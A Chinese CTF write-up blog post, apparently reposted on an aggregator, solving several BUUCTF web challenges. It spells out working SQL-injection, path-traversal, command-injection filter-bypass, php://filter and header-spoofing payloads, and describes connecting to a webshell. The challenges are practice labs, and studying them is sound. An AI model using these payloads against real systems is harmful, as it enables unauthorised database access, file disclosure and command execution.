IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> buuctf一天小练习 -> 正文阅读

[PHP知识库]buuctf一天小练习

前言

文章同步于我的个人博客https://quan9i.top/buuctf1/,欢迎大家访问
在这里插入图片描述

想找点不一样的题看看,因此来刷了几道buu的题,并记录如下

[极客大挑战 2019]EasySQL

进入靶场,发现是登录的这种
在这里插入图片描述首先看能不能注入

1'
1

执行结果
在这里插入图片描述
这说明是字符型注入,且包裹方式为单引号包裹,这里其实就不用再做了,万能一句一注就好了

1'or 1=1 #
1

在这里插入图片描述当然,常规办法肯定可行,流程依据是判断字段数,爆库,爆列名,爆字段,但这个题设置的很简单,在获取数据库时就会爆出flag,具体过程不再演示。

[HCTF 2018]WarmUp

进入靶场
在这里插入图片描述
这时候就一个表情,看啥呢,当然是看源码
在这里插入图片描述访问注释的文件

 <?php
    highlight_file(__FILE__);//语法高亮
    class emmm //定义一个类
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];// 声明白名单数组
            if (! isset($page) || !is_string($page)) {	//如果page没被定义或不是字符串
                echo "you can't see it";
                return false; 
            }

            if (in_array($page, $whitelist)) { //如果变量page在白名单中
                return true;
            }

            $_page = mb_substr( //从最开始开始截取$page,截取到'?'前,但它后面在最后拼接了个?,其实这就是原样,只是换了个变量名
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) { //如果变量在白名单中,返回true
                return true;
            }

            $_page = urldecode($page); //将变量page进行url解码赋值给变量_page
            $_page = mb_substr(  //截取?前的赋给变量_page
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) { //如果在白名单中,返回true
                return true;
            }
            echo "you can't see it"; 
            return false;
        }
    }

    if (! empty($_REQUEST['file']) 如果变量file非空且为字符串且符号上面的那些要求
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file']; #include 变量file
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?> 

此时一大波代码映入眼帘,发现还有一个文件hint.php,访问一下
在这里插入图片描述看这个样子应该是给出了flag所在的文件名
emmm,然后就开始分析代码吧(我在下介绍一下用到的函数)
可以发现定义的那个类需要都满足true,才能往下继续进行,所以从上往下看,
第一个if语句要求非空且为字符串,这个比较容易,
再看第二个if语句,这个想要能正确执行的话,我们只能输入file=source.php或者file=hint.php,不过这个执行失败进行的是截取,而不是返回false,因此我们不用管这个就行,
第三个if语句也是如此,不过他在失败后是先对变量进行了url解码然后再截取,然后检测是否还在白名单中,
再看第四个,第四个if是匹配白名单的,如果在白名单中才会返回true,而我们需要返回结果为true,因此我们需要让第四个执行正确,也就是说我们需要此时的语句在白名单中,那我们倒推一下,此时payload为source.php在往上看,截取之前就是source.php?xxxx,再往上发现有一次解码,说明我们在这里对?进行一次编码,才能往下得到?,因此payload就是source.php%3fxxxxx,我们知道服务器端自动解码一次,所以我们需要再编码一次,payload如下方

?file=source.php?%253fxxxx
//%253f是二次编码后的?

当然我们也可以直接在source后直接加上?xxxx,这样?就会被截取,返回的最终结果也是true
科普一个小知识

. .表示当前目录的上一级目录。
. ./表示当前目录下的某个文件或文件夹,视后面跟着的名字而定

此时我们想起来hint中的注释,我们在这里直接通过…/来查找flag,构造最终payload如下

?file=source.php?%253f/../../../../ffffllllaaaagggg
或
?file=source.php?/../../../../ffffllllaaaagggg

在这里插入图片描述
部分函数介绍

my_substr:截取函数,类似于substr,示例如下

<?php
 echo mb_substr("菜鸟教程", 0, 2); 
 // 输出:菜鸟
 ?>

my_strpos(被查字符串,寻找的字符串,起始位置):函数查找字符串在另一字符串中第一次出现的位置(区分大小写)。示例如下

<?php
echo strpos("Hello world!","world");//输出为6,之所以不是7是因为字符串第一位为0而不是1
?>

in_array:搜索数组中是否存在指定的值。示例如下

<?php
$people = array("Bill", "Steve", "Mark", "David");
if (in_array("Mark", $people))
  {
  echo "匹配已找到";
  }
else
  {
  echo "匹配未找到";
  }
?>

[GXYCTF2019]Ping Ping Ping

在这里插入图片描述
进入后提示了变量名为id,我们先ping本地,发现正常,尝试用管道符+ls查看文件

?ip=1|ls

在这里插入图片描述发现flag.php,尝试以获取flag

?ip=1|cat flag.php

在这里插入图片描述看这个语句,大致是过滤了空格的意思,在这里我们采用$IFS$9绕过

?ip=1|cat$IFS$9flag.php

在这里插入图片描述
emmm,好像flag也给过滤了,那我们先查看另一个文件

?ip=1|cat$IFS$9index.php

在这里插入图片描述

可以发现过滤了很多,本来我想用include包含一个文件再查看flag实现绕过,但[]也被绕过了,没办法只好学习一下其他师傅的绕过姿势

方法一

利用ls和特殊符号`,这时候执行的语句就是tac查当前目录下的文件(cat文件的话需要看注释才能获取),构造payload如下

?ip=1|tac$IFS$9`ls`

在这里插入图片描述

方法二

变量覆盖,设置一个变量a,另其等于g,这样就可以用fla$a来替代flag,构造payload如下

?ip=1;a=g;tac$IFS$1fla$a.php

在这里插入图片描述

[极客大挑战 2019]Secret File

在这里插入图片描述
界面没有什么东西,查源码
在这里插入图片描述
发现文件,点击查看
在这里插入图片描述有用的仍然只有一个文件链接,查看
在这里插入图片描述
发现没了,此时我也是一头雾水,但回过头来看,中间那个文件给的明明是/action.php,却跳转到了end.php,说明文件被重定向了,用bp抓action.php文件的包
在这里插入图片描述
访问该文件
在这里插入图片描述
查看一下flag.php
在这里插入图片描述
不存在flag,回去看php文件,发现它过滤了input,data,想起来伪协议,还有一个filter没被过滤,构造payload如下

?file=php://filter/read=convert.base64-encode/resource=flag.php

执行结果
在这里插入图片描述
base64解码后
在这里插入图片描述
解题完成

[极客大挑战 2019]LoveSQL

进入靶场
在这里插入图片描述发现是用户名登陆这种,判断注入类型

1'
1

在这里插入图片描述呃,单引号包裹的,尝试万能语句

1' or 1=1#
1

在这里插入图片描述emm,这个很狗,应该是把sql语句改了,那只能按常规办法来了
判断字段数

1' order by 4#

在这里插入图片描述字段数为3
联合查询看哪个有回显

-1'union select 1,2,3#

在这里插入图片描述查库

-1'union select 1,2,database()#

在这里插入图片描述查表

-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#

在这里插入图片描述查列

-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

在这里插入图片描述查字段信息

-1'union select 1,2,group_concat(password) from l0ve1ysq1 #

在这里插入图片描述
解题完成

[极客大挑战 2019]Http

进入靶场
在这里插入图片描述
没有找到什么可用信息,查看源码
在这里插入图片描述
发现一个隐藏文件,访问一下
在这里插入图片描述
提示不是来自这个网址的,http中有一个Referer,在这里简单科普一下

Referer是HTTP请求header的一部分
Referer字段实际上告诉了服务器,用户在访问当前资源之前的位置。这往往可以用来用户跟踪。

因此我们可以指定Referer为这个网址,利用hackbar插件或者bp都可以
在这里插入图片描述

此时提示用 Syclover来浏览,修改UA,科普一下

User-Agent 即用户代理,简称“UA”,它是一个特殊字符串头。网站服务器通过识别 “UA”来确定用户
所使用的操作系统版本、CPU 类型、浏览器版本等信息。而网站服务器则通过判断 UA 来给客户端发送
不同的页面。

在这里插入图片描述
此时提示只能本地访问,我们可以用xff伪造本机回环地址,科普一下

X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始
的IP地址的HTTP请求头字段

在这里插入图片描述得到flag,解题完成

[极客大挑战 2019]Knife

在这里插入图片描述
长得真像一句话木马,还丢菜刀,一看就是让用菜刀来获取webshell,哎,我偏不用菜刀,用蚁剑,就是玩
以Syc作为密码进行连接
在这里插入图片描述在根目录下找到flag
在这里插入图片描述
在这里插入图片描述
解题完成

[SUCTF 2019]EasySQL

进入靶场
在这里插入图片描述
发现这种模式有点像堆叠注入,不确定,先用fuzz查一下有没有过滤掉的函数,具体操作如下
用bp抓包,发送到爆破模块,清除变量,在给query后添加一个变量
在这里插入图片描述在payloads中使用bp的fuzz字典进行爆破,或者使用自己的
在这里插入图片描述
跑完后发现数据分三种
第一种是没有任何回显的,说明应该是没被过滤的
在这里插入图片描述第二种返回了nonono,这种应该是被过滤掉了
在这里插入图片描述
第三种是返回了数据,这个也不知道有啥用,先记着
在这里插入图片描述
此时我们所用的方法不多,select被过滤了,联合查询没法用,报错注入用的函数也被过滤了,尝试一下堆叠注入

1;show databases;

在这里插入图片描述
可行,emm,那继续注,查表

1;show tables;

在这里插入图片描述OHHHHHH,Flag表,那是不是flag就在这里呢,尝试查看一下

1;select flag from Flag;

在这里插入图片描述
emmm,果然,不会让我们这么轻易的得到flag,flag被过滤了
此时再看一下最上面,他说输入flag,它来判断对不对,那他肯定是从有flag的表中查的,再看我们刚刚获取的表,那不就是Flag,那他后端sql语句此时肯定就是一个select flag from Flag这样子,但是还要检测我们的数据,那它肯定是select post[xxx]这样子,再把这俩结合一下,肯定不能用&&,那还剩的就是||,因此后端语句就是select post[xxx] || flag from Flag,知道后端语句的话,那解题不就易如反掌,方法有以下两种

方法一

sql中有一种方法可以使||变成拼接符,如下

set sql_mode=PIPES_AS_CONCAT;

因此我们可以构造payload如下

1;set sql_mode=PIPES_AS_CONCAT;select 1

后端的语句就是

select 3;set sql_mode=PIPES_AS_CONCAT;||select 3flag from Flag
//字母前面的数字没啥影响,会跟着回显到界面上

执行结果在这里插入图片描述

方法二

构造payload如下

*,1

此时后端语句就是

select *1||flag from Flag
,用于查询多个数据
第一个select *就可以查出来flag
第二个1||flag 执行结果为1

执行结果在这里插入图片描述
解题完成

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-03-24 00:17:59  更:2022-03-24 00:18:05 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 10:28:16-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码